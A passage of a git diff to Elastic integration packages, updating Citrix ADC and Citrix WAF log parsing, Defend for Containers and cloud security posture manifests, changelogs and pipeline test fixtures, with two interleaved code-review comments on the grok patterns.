"id": "logs-*", + "name": "2dfcb670-693f-4f10-9717-e4056e66a4f1:indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2dfcb670-693f-4f10-9717-e4056e66a4f1:a67fd70d-3451-43ad-8947-9549dde00283", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f9e0bb83-7c80-4abb-8a68-5be15c8f096b:indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f9e0bb83-7c80-4abb-8a68-5be15c8f096b:90bfe744-969a-453e-af29-e3ef2dd9cc25", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6c5b6057-a76c-4a86-9ae5-5648e38c7b71:indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6c5b6057-a76c-4a86-9ae5-5648e38c7b71:fe0867c1-6ca2-4dac-88ce-6f1b36a9d1bf", + "type": 
"index-pattern" + }, + { + "id": "logs-*", + "name": "4c8a3f96-6e7a-4bdb-acbe-f52e4f7dc6b2:indexpattern-datasource-layer-771a3ae6-3454-44c5-8386-30e43d147b04", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4c8a3f96-6e7a-4bdb-acbe-f52e4f7dc6b2:9e48fe6b-c833-4cf4-82cc-8323783d52e1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7fd7a318-184d-4c0c-b0ee-b8958117a04a:indexpattern-datasource-layer-771a3ae6-3454-44c5-8386-30e43d147b04", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7fd7a318-184d-4c0c-b0ee-b8958117a04a:f2fd7484-cb11-4fe0-947b-a5c3e845e677", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b1a20813-82f1-4ba0-b295-695020f85209:indexpattern-datasource-layer-1d85203e-e619-44d1-99eb-1890f1a7c084", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b1a20813-82f1-4ba0-b295-695020f85209:f1141519-608f-4767-96cc-24e8842474ca", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a2059241-c442-45ca-a3f9-9155480ec367:indexpattern-datasource-layer-1d85203e-e619-44d1-99eb-1890f1a7c084", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a2059241-c442-45ca-a3f9-9155480ec367:9e133606-638d-42c5-a4ef-01ec82c06598", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2df4dd1c-9b9c-411a-9aed-c37b6a535b78:indexpattern-datasource-layer-1d85203e-e619-44d1-99eb-1890f1a7c084", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2df4dd1c-9b9c-411a-9aed-c37b6a535b78:cf79bd3f-262a-4663-8fff-63b00b87c34b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "87d8f4ae-bff3-4541-93f6-5f0495b22354:indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "87d8f4ae-bff3-4541-93f6-5f0495b22354:813eba55-180f-41d5-9693-3bb4cbaa5b93", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"6362ec71-d94c-40ae-a3b0-6fd99a74f3fa:indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6362ec71-d94c-40ae-a3b0-6fd99a74f3fa:0000c5e7-f881-4b37-84b1-5f87b3c39298", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "04dd2a49-ecb6-4a37-9ed1-ff4cb32e7315:indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "04dd2a49-ecb6-4a37-9ed1-ff4cb32e7315:c67b80ce-454e-4e6c-b76d-1b09a8fe8736", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6a0db5d9-5c35-4822-8be4-ba29d9e4a414:indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6a0db5d9-5c35-4822-8be4-ba29d9e4a414:03db2a39-f594-4c99-9a96-4d0ea0803a78", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6339da61-ce3d-40ff-b7dc-4d5525f5ccf7:indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6339da61-ce3d-40ff-b7dc-4d5525f5ccf7:6cf95b00-4a04-4ca9-94f4-877e91791676", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e89299e1-4cd9-49ef-89e8-3864d1224469:indexpattern-datasource-layer-56ec7bd9-8eff-4c45-86fb-96ff48db7730", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e89299e1-4cd9-49ef-89e8-3864d1224469:244824be-e6fc-4121-8159-e2a4e11c0a2a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d9220f99-2e6e-4c43-b55a-54cb8b3cb55f:indexpattern-datasource-layer-56ec7bd9-8eff-4c45-86fb-96ff48db7730", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d9220f99-2e6e-4c43-b55a-54cb8b3cb55f:8e92059b-9b18-4b02-b102-bef8a1787d78", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a02365ac-b2de-4f1c-a59f-ec763f0634e7:indexpattern-datasource-layer-1d2c9c58-fe87-46cd-943e-90fb37a18c6e", + "type": "index-pattern" + }, + 
{ + "id": "logs-*", + "name": "a02365ac-b2de-4f1c-a59f-ec763f0634e7:1d0d4d94-f9bb-4246-aa05-c02d3a7d23ec", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8d5ccace-9260-4464-af7c-6165af68480e:indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8d5ccace-9260-4464-af7c-6165af68480e:baa1a399-bb78-458e-a95e-da29abcb3374", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c5c252e5-add3-46e7-9d63-133881e24666:indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c5c252e5-add3-46e7-9d63-133881e24666:6cab624e-160d-43ec-8f70-e80787f5d46b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c6e8140c-ab76-433a-9309-8bdb471ae311:indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c6e8140c-ab76-433a-9309-8bdb471ae311:4a5fe18d-b8d0-45d1-9937-9bfe329f4c85", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "26ab28ea-2f8d-4612-92ed-0bc9cf0f56c2:indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "26ab28ea-2f8d-4612-92ed-0bc9cf0f56c2:d8c7fbbb-d7dc-4b07-99ca-c30b4334fdf6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "164d7357-8f59-4773-a775-fe7faee555de:layer_1_join_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "164d7357-8f59-4773-a775-fe7faee555de:layer_2_join_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_6ab2c79f-26b6-40d8-b815-11f62306ce5b:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_7849d87b-cbf3-47c3-b808-135dbf36be2b:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"controlGroup_6351864e-e4f7-4e0e-87be-cfbadfc617e5:optionsListDataView",
+ "type": "index-pattern"
+ },
+ {
+ "id": "logs-*",
+ "name": "controlGroup_65ecce3a-f292-4786-bbe8-5d9a0964a5ce:optionsListDataView",
+ "type": "index-pattern"
+ }
+ ],
+ "type": "dashboard"
+}
\ No newline at end of file
diff --git a/packages/citrix_adc/manifest.yml b/packages/citrix_adc/manifest.yml
index a5a9914dd6e..34ca396f65c 100644
--- a/packages/citrix_adc/manifest.yml
+++ b/packages/citrix_adc/manifest.yml
@@ -1,15 +1,15 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: citrix_adc
 title: Citrix ADC
-version: "1.2.0"
-description: This Elastic integration collects metrics from Citrix ADC product.
+version: "1.5.1"
+description: This Elastic integration collects logs and metrics from Citrix ADC product.
 type: integration
 categories:
 - observability
 - network
 conditions:
 kibana:
- version: ^8.7.1
+ version: ^8.12.0
 elastic:
 subscription: basic
 icons:
@@ -42,6 +42,10 @@ screenshots:
 title: Citrix ADC VPN dashboard
 size: 600x600
 type: image/png
+ - src: /img/citrix_adc-log-dashboard.png
+ title: Citrix ADC Overview
+ size: 3352x3206
+ type: image/png
 policy_templates:
 - name: Citrix ADC
 title: Citrix ADC metrics
@@ -76,6 +80,7 @@ policy_templates:
 - name: password
 type: password
 title: Password
+ secret: true
 show_user: true
 required: false
 default: nsroot
@@ -109,6 +114,15 @@ policy_templates:
 # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk
 # sxSmbIUfc2SGJGCJD4I=
 # -----END CERTIFICATE-----
+ - type: tcp
+ title: Collect logs from Citrix ADC via TCP
+ description: Collecting logs from Citrix ADC via TCP
+ - type: udp
+ title: Collect logs from Citrix ADC via UDP
+ description: Collecting logs from Citrix ADC via UDP
+ - type: logfile
+ title: Collect logs from Citrix ADC via file
+ description: Collecting logs from Citrix ADC via file
 owner:
 github: elastic/obs-infraobs-integrations
 type: elastic
diff --git a/packages/citrix_waf/changelog.yml b/packages/citrix_waf/changelog.yml
index ece34abb250..826d91d554b 100644
--- a/packages/citrix_waf/changelog.yml
+++ b/packages/citrix_waf/changelog.yml
@@ -1,4 +1,14 @@
 # newer versions go on top
+- version: "1.15.0"
+ changes:
+ - description: Relax message header parsing constraints.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9285
+- version: "1.14.0"
+ changes:
+ - description: Update package spec to 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9235
 - version: "1.13.2"
 changes:
 - description: Changed owners
diff --git a/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log b/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log
index b5ea35e8088..c5ce92b6c9d 100644
--- a/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log
+++ b/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log
@@ -3,4 +3,8 @@ Jun 22 19:14:37 81.2.69.144 12/04/2017:17:21:00 GMT citrix.netscal
 Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352
 Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4472 0 : Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1
 Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4473 0 : Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1
-Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4474 0 : Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1
\ No newline at end of file
+Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4474 0 : Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1
+<134> 2024/03/04:17:59:39 GMT 0-PPE-1 : default API CMD_EXECUTED 149531 0 : User - ADM_User NONE - Remote_ip - Command "logout" - Status "Success"
+<134> 2024/03/06:21:02:04 GMT host1 0-PPE-0 : default AAA Message 490029 0 : "Authentication is rejected for sshah (client ip : 81.2.69.144 , vserver ip: 192.168.10.10 ), extended error, if any : "
+<133> 2024/03/06:21:02:04 GMT host1 0-PPE-0 : default AAA Message 490026 0 : "sslvpn_aaad_login_handler : (0-125662): sslvpn_aaad_login_handler: Reply Received, status from aaad: 3, aaad flags 1000"
+<134> 
2024/03/06:21:02:04 GMT host1 0-PPE-0 : default AAA Message 490023 0 : "ns_aaa_login_handler : X509 cert not found "
diff --git a/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json b/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json
index a12dbb91edd..1193674d702 100644
--- a/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json
+++ b/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json
@@ -228,6 +228,93 @@
 "severity": 0,
 "timezone": "GMT"
 }
+ },
+ {
+ "@timestamp": "2024-03-04T17:59:39.000Z",
+ "citrix": {
+ "cef_format": false,
+ "default_class": true,
+ "detail": "<134> 2024/03/04:17:59:39 GMT 0-PPE-1 : default API CMD_EXECUTED 149531 0 : User - ADM_User NONE - Remote_ip - Command \"logout\" - Status \"Success\"",
+ "device_event_class_id": "API",
+ "extended": {
+ "message": "User - ADM_User NONE - Remote_ip - Command \"logout\" - Status \"Success\""
+ },
+ "name": "CMD_EXECUTED"
+ },
+ "ecs": {
+ "version": "8.11.0"
+ },
+ "event": {
+ "id": "149531",
+ "severity": 0,
+ "timezone": "GMT"
+ }
+ },
+ {
+ "@timestamp": "2024-03-06T21:02:04.000Z",
+ "citrix": {
+ "cef_format": false,
+ "default_class": true,
+ "detail": "<134> 2024/03/06:21:02:04 GMT host1 0-PPE-0 : default AAA Message 490029 0 : \"Authentication is rejected for sshah (client ip : 81.2.69.144 , vserver ip: 192.168.10.10 ), extended error, if any : \"",
+ "device_event_class_id": "AAA",
+ "extended": {
+ "message": "Authentication is rejected for sshah (client ip : 81.2.69.144 , vserver ip: 192.168.10.10 ), extended error, if any : "
+ },
+ "host": "host1",
+ "name": "Message"
+ },
+ "ecs": {
+ "version": "8.11.0"
+ },
+ "event": {
+ "id": "490029",
+ "severity": 0,
+ "timezone": "GMT"
+ }
+ },
+ {
+ "@timestamp": "2024-03-06T21:02:04.000Z",
+ "citrix": {
+ "cef_format": false,
+ "default_class": true,
+ "detail": "<133> 2024/03/06:21:02:04 GMT host1 0-PPE-0 : default AAA Message 490026 0 : \"sslvpn_aaad_login_handler : (0-125662): sslvpn_aaad_login_handler: Reply Received, status from aaad: 3, aaad flags 1000\"",
+ "device_event_class_id": "AAA",
+ "extended": {
+ "message": "sslvpn_aaad_login_handler : (0-125662): sslvpn_aaad_login_handler: Reply Received, status from aaad: 3, aaad flags 1000"
+ },
+ "host": "host1",
+ "name": "Message"
+ },
+ "ecs": {
+ "version": "8.11.0"
+ },
+ "event": {
+ "id": "490026",
+ "severity": 0,
+ "timezone": "GMT"
+ }
+ },
+ {
+ "@timestamp": 
"2024-03-06T21:02:04.000Z",
+ "citrix": {
+ "cef_format": false,
+ "default_class": true,
+ "detail": "<134> 2024/03/06:21:02:04 GMT host1 0-PPE-0 : default AAA Message 490023 0 : \"ns_aaa_login_handler : X509 cert not found \"",
+ "device_event_class_id": "AAA",
+ "extended": {
+ "message": "ns_aaa_login_handler : X509 cert not found "
+ },
+ "host": "host1",
+ "name": "Message"
+ },
+ "ecs": {
+ "version": "8.11.0"
+ },
+ "event": {
+ "id": "490023",
+ "severity": 0,
+ "timezone": "GMT"
+ }
 }
 ]
 }
\ No newline at end of file
diff --git a/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/default.yml
index a39948879c8..7f0e7b6ca42 100644
--- a/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -14,6 +14,7 @@ processors:
 field: event.original
 patterns:
 - '^%{SYSLOG_TIMESTAMP} %{LEVEL} %{IP:client.ip:ip} %{GREEDYDATA:citrix.detail}'
+ - '^%{GREEDYDATA:citrix.detail}'
 pattern_definitions:
 LEVEL: '?'
 IDENT: '[a-zA-Z][a-zA-Z0-9]*'
@@ -69,6 +70,7 @@ processors:
 field: _tmp.timestamp_native
 formats:
 - MM/dd/yyyy:HH:mm:ss
+ - yyyy/MM/dd:HH:mm:ss
 timezone: '{{{event.timezone}}}'
 - remove:
 field: citrix.event_year
diff --git a/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/native.yml b/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/native.yml
index a4776f5ae3e..bb3d845f58c 100644
--- a/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/native.yml
+++ b/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/native.yml
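Review bot: The fallback `- '^%{GREEDYDATA:citrix.detail}'` in the `event.original` grok matches any input, so this processor can no longer fail, and a line that is neither syslog-wrapped nor in the native format now flows on with `client.ip` unset and nothing marking it as unparsed; only the later native grok can still reject it. That makes malformed or unexpected input indistinguishable from the intended bare-native case, which matters for a source whose events feed authentication and WAF detections. Consider tagging events that took the fallback so they stay visible, e.g. an `append` processor right after this grok with `field: tags`, a constructed value such as `citrix_waf_no_syslog_header`, and `if: ctx.client?.ip == null`. The processor's own `- grok:` line and any `on_failure` it carries start outside the hunk.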
@@ -8,10 +8,11 @@ processors: description: Extract native header and message. field: citrix.detail patterns: + - '^%{HEADER} : %{GREEDYDATA:_tmp.details} : +"%{GREEDYDATA:citrix.extended.message}"' - '^%{HEADER} : %{GREEDYDATA:_tmp.details} : +%{GREEDYDATA:citrix.extended.message}' pattern_definitions: - HEADER: '%{NATIVE_TIMESTAMP:_tmp.timestamp_native} %{WORD:event.timezone} %{SYSLOGHOST:citrix.host} %{INT}-PPE-%{INT}' - NATIVE_TIMESTAMP: '%{MONTHNUM}/%{MONTHDAY}/%{YEAR}:%{HOUR}:%{MINUTE}:%{SECOND}' + HEADER: '(?:<%{NUMBER}>%{SPACE})?%{NATIVE_TIMESTAMP:_tmp.timestamp_native} %{WORD:event.timezone} (?:%{SYSLOGHOST:citrix.host} )?%{INT}-PPE-%{INT}' + NATIVE_TIMESTAMP: '(?:%{MONTHNUM}/%{MONTHDAY}/%{YEAR}|%{YEAR}/%{MONTHNUM}/%{MONTHDAY}):%{HOUR}:%{MINUTE}:%{SECOND}' - grok: description: Parse out details. field: _tmp.details diff --git a/packages/citrix_waf/manifest.yml b/packages/citrix_waf/manifest.yml index 2cd5661fe9a..c7984af148b 100644 --- a/packages/citrix_waf/manifest.yml +++ b/packages/citrix_waf/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: citrix_waf title: "Citrix Web App Firewall" -version: "1.13.2" +version: "1.15.0" description: Ingest events from Citrix Systems Web App Firewall. type: integration categories: diff --git a/packages/cloud_defend/changelog.yml b/packages/cloud_defend/changelog.yml index c3efcccded3..c3e28d122d1 100644 --- a/packages/cloud_defend/changelog.yml +++ b/packages/cloud_defend/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.2.5" + changes: + - description: Update integration support matrix + type: enhancement + link: https://github.com/elastic/integrations/pull/9441 +- version: "1.2.4" + changes: + - description: Fix integration subscription tier + type: enhancement + link: https://github.com/elastic/integrations/pull/9416 - version: "1.2.3" changes: - description: Changed owners 
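Review bot: The new optional `(?:<%{NUMBER}>%{SPACE})?` prefix in `HEADER` discards the syslog priority instead of keeping it, and the new test events show why that matters: the rejected-authentication line arrives as `<134>` and the aaad reply as `<133>`, yet both are expected with `event.severity: 0`, so nothing downstream can rank them unless severity is derived elsewhere in the pipeline (not visible here). Capturing the value is a one-token change, `(?:<%{NONNEGINT:log.syslog.priority:int}>%{SPACE})?`, after which facility and severity can be split with `priority / 8` and `priority % 8` in a small script or set processor. Making `citrix.host` optional is sensible for the `0-PPE-1` sample, but such events then carry no host at all; a comment next to the pattern saying whether the caller is expected to fill `host.name` from the transport would help the next maintainer. The `processors:` list this grok belongs to begins outside the hunk.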
diff --git a/packages/cloud_defend/docs/README.md b/packages/cloud_defend/docs/README.md index 7534b6a6019..9708be5e96e 100644 --- a/packages/cloud_defend/docs/README.md +++ b/packages/cloud_defend/docs/README.md @@ -412,7 +412,7 @@ The following fields are populated for all events where `event.category: file` # Support matrix -|   | EKS 1.24-1.26 (AL2022) | GKE 1.24-1.26 (COS) | +|   | EKS 1.24-1.27 (AL2022) | GKE 1.24-1.27 (COS) | | -- | -- | -- | | Process event exports | ✅ | ✅ | | File event exports | ✅ | ✅ | diff --git a/packages/cloud_defend/manifest.yml b/packages/cloud_defend/manifest.yml index 0c80a97b427..c23c7bba4fa 100644 --- a/packages/cloud_defend/manifest.yml +++ b/packages/cloud_defend/manifest.yml @@ -1,7 +1,7 @@ format_version: 3.0.0 name: cloud_defend title: "Defend for Containers" -version: 1.2.3 +version: 1.2.5 source: license: "Elastic-2.0" description: "Elastic Defend for Containers (BETA) provides cloud-native runtime protections for containerized environments." @@ -14,6 +14,7 @@ conditions: kibana: version: ^8.11.0 elastic: + subscription: enterprise capabilities: - security screenshots: diff --git a/packages/cloud_security_posture/changelog.yml b/packages/cloud_security_posture/changelog.yml index 0d1cc37f062..795d75d3942 100644 --- a/packages/cloud_security_posture/changelog.yml +++ b/packages/cloud_security_posture/changelog.yml @@ -1,5 +1,6 @@ # newer versions go on top # version map: +# 1.9.x - 8.14.x # 1.8.x - 8.13.x # 1.7.x - 8.12.x # 1.6.x - 8.11.x 
@@ -7,8 +8,32 @@ # 1.4.x - 8.9.x # 1.3.x - 8.8.x # 1.2.x - 8.7.x -- version: "1.8.0-preview05" +- version: "1.9.0-preview03" changes: + - description: Update findings ingest pipeline to remove empty cloud.account.id and cloud.account.name + type: enhancement + link: https://github.com/elastic/integrations/pull/9470 +- version: "1.9.0-preview02" + changes: + - description: Fix cluster_id missing error in the Ingest Pipeline + type: bugfix + link: https://github.com/elastic/integrations/pull/9434 +- version: "1.9.0-preview01" + changes: + - description: Convert fields to secrets + type: enhancement + link: https://github.com/elastic/integrations/pull/9331 +- version: "1.8.0" + changes: + - description: Bump up version + type: enhancement + link: https://github.com/elastic/integrations/pull/9331 + - description: Add cloudsecurity_cdr sub category label. + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 + - description: Add missing CIS Azure rule templates + type: enhancement + link: https://github.com/elastic/integrations/pull/9211 - description: Rollback CIS Azure Rules 9.3,9.10 type: bugfix link: https://github.com/elastic/integrations/pull/8799 @@ -24,6 +49,9 @@ - description: Adopt Secrets type: enhancement link: https://github.com/elastic/integrations/pull/8665 + - description: Bump version + type: enhancement + link: https://github.com/elastic/integrations/pull/9168 - version: "1.7.1" changes: - description: Remove disabled fields. diff --git a/packages/cloud_security_posture/data_stream/findings/_dev/test/pipeline/test-findings-log.json b/packages/cloud_security_posture/data_stream/findings/_dev/test/pipeline/test-findings-log.json new file mode 100644 index 00000000000..9615905bfc6 --- /dev/null +++ b/packages/cloud_security_posture/data_stream/findings/_dev/test/pipeline/test-findings-log.json 
@@ -0,0 +1,116 @@ +{ + "events": [ + { + "rule": { + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "rule_number": "1.23", + "id": "cis_azure", + "version": "v2.0.0", + "posture_type": "cspm" + } + }, + "cloud": { + "provider": "azure", + "account": { + "id": "", + "name": "" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + }, + { + "rule": { + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "rule_number": "1.23", + "id": "cis_azure", + "version": "v2.0.0", + "posture_type": "cspm" + } + }, + "cloud": { + "provider": "azure", + "account": { + "id": "test", + "name": "" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + }, + { + "rule": { + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "rule_number": "1.23", + "id": "cis_azure", + "version": "v2.0.0", + "posture_type": "cspm" + } + }, + "cloud": { + "provider": "azure", + "account": { + "id": "test-2", + "name": "test 2" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + }, + { + "rule": { + "benchmark": { + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "rule_number": "3.2.5", + "id": "cis_eks", + "version": "v1.0.1" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + }, + { + "rule": { + "benchmark": { + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "rule_number": "3.2.5", + "id": "cis_eks", + "version": "v1.0.1", + "posture_type": "kspm" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + }, + { + "cluster_id": "cluster_test_1", + "rule": { + "benchmark": { + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "rule_number": "3.2.5", + "id": "cis_eks", + "version": "v1.0.1", + "posture_type": "kspm" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + }, + { + "cluster_id": "cluster_test_1", + "orchestrator": { + "cluster": { + "name": "cluster_test", + "id": "cluster_test" + } + }, + "rule": { + "benchmark": { + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "rule_number": "3.2.5", + "id": "cis_eks", + "version": 
"v1.0.1", + "posture_type": "kspm" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + } + ] +} diff --git a/packages/cloud_security_posture/data_stream/findings/_dev/test/pipeline/test-findings-log.json-expected.json b/packages/cloud_security_posture/data_stream/findings/_dev/test/pipeline/test-findings-log.json-expected.json new file mode 100644 index 00000000000..bb1fa5193fd --- /dev/null +++ b/packages/cloud_security_posture/data_stream/findings/_dev/test/pipeline/test-findings-log.json-expected.json 
@@ -0,0 +1,139 @@ +{ + "expected": [ + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "cloud": { + "account": {}, + "provider": "azure" + }, + "ecs": { + "version": "8.6.0" + }, + "rule": { + "benchmark": { + "id": "cis_azure", + "name": "CIS Microsoft Azure Foundations", + "posture_type": "cspm", + "rule_number": "1.23", + "version": "v2.0.0" + } + } + }, + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "cloud": { + "account": { + "id": "test" + }, + "provider": "azure" + }, + "ecs": { + "version": "8.6.0" + }, + "rule": { + "benchmark": { + "id": "cis_azure", + "name": "CIS Microsoft Azure Foundations", + "posture_type": "cspm", + "rule_number": "1.23", + "version": "v2.0.0" + } + } + }, + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "cloud": { + "account": { + "id": "test-2", + "name": "test 2" + }, + "provider": "azure" + }, + "ecs": { + "version": "8.6.0" + }, + "rule": { + "benchmark": { + "id": "cis_azure", + "name": "CIS Microsoft Azure Foundations", + "posture_type": "cspm", + "rule_number": "1.23", + "version": "v2.0.0" + } + } + }, + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "ecs": { + "version": "8.6.0" + }, + "rule": { + "benchmark": { + "id": "cis_eks", + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "posture_type": "kspm", + "rule_number": "3.2.5", + "version": "v1.0.1" + } + } + }, + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "ecs": { + "version": "8.6.0" + }, + "rule": { + "benchmark": { + "id": "cis_eks", + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "posture_type": "kspm", + "rule_number": "3.2.5", + "version": "v1.0.1" + } + } + }, + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "cluster_id": "cluster_test_1", + "ecs": { + "version": "8.6.0" + }, + "orchestrator": { + "cluster": { + "id": "cluster_test_1" + } + }, + "rule": { + "benchmark": { + "id": "cis_eks", + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "posture_type": "kspm", + "rule_number": "3.2.5", + "version": "v1.0.1" + } + } + }, + 
